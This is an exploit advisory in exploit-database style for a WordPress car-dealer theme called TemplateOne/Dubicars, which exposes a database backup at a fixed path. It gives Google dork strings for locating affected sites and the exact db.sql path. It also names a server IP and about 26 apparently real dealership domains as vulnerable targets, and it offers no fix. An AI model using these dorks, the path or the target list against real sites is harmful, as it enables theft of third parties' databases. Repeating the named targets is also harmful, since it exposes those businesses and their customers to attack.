#################################################################################################
# Exploit Title : WordPress TemplateOne Themes Dubicars Database Backup Information Disclosure Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 19/11/2018
# Vendor Homepage : wordpress.org ~ dubicars.com
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : All Current Versions
# Google Dorks :
inurl:''/wp-content/themes/templateone/''
intext:''© Copyright 2015 | Powered by Dubicars''
intext:''© Copyright 2017 | Powered by Dubicars''
intext:''© Copyright 2018 | Powered by Dubicars''
intext:''Powered by Dubicars''
# Exploit Risk : Medium
# CWE : CWE-264 - [ Permissions, Privileges, and Access Controls ]
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
#################################################################################################
# Admin Panel Login Path :
/wp-login.php
# Exploit :
/wp-content/themes/templateone/db.sql
#################################################################################################
# Example Vulnerable Sites =>
Vulnerable IP Address => (108.179.230.34)
There are 236 domains hosted on this server.
[+] simurghcars.ae/wp-content/themes/templateone/db.sql
[+] romeocars.ae/wp-content/themes/templateone/db.sql
[+] katrjimotors.com/wp-content/themes/templateone/db.sql
[+] algharymotors.ae/wp-content/themes/templateone/db.sql
[+] alaramcars.com/wp-content/themes/templateone/db.sql
[+] alsalamamotors.com/wp-content/themes/templateone/db.sql
[+] diamondclassmotors.com/wp-content/themes/templateone/db.sql
[+] tantoauto.com/wp-content/themes/templateone/db.sql
[+] storyauto-middleeast.com/wp-content/themes/templateone/db.sql
[+] tantoauto.com/wp-content/themes/templateone/db.sql
[+] whitemotors.org/wp-content/themes/templateone/db.sql
[+] 555motors.ae/wp-content/themes/templateone/db.sql
[+] tahanmotors.com/wp-content/themes/templateone/db.sql
[+] binhumaidan.com/wp-content/themes/templateone/db.sql
[+] formulaautofze.com/wp-content/themes/templateone/db.sql
[+] alnayrabusedcarstrading.com/wp-content/themes/templateone/db.sql
[+] exoticusedcarstr.com/wp-content/themes/templateone/db.sql
[+] dairausedcars.com/wp-content/themes/templateone/db.sql
[+] usmotorsuae.com/wp-content/themes/templateone/db.sql
[+] saleemmotors.com/wp-content/themes/templateone/db.sql
[+] moradmotors.com/wp-content/themes/templateone/db.sql
[+] najemmotors.com/wp-content/themes/templateone/db.sql
[+] jwmotors.net/wp-content/themes/templateone/db.sql
[+] ibitisammotors.com/wp-content/themes/templateone/db.sql
[+] classmotorsuae.com/wp-content/themes/templateone/db.sql
[+] alshibamotors.com/wp-content/themes/templateone/db.sql
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################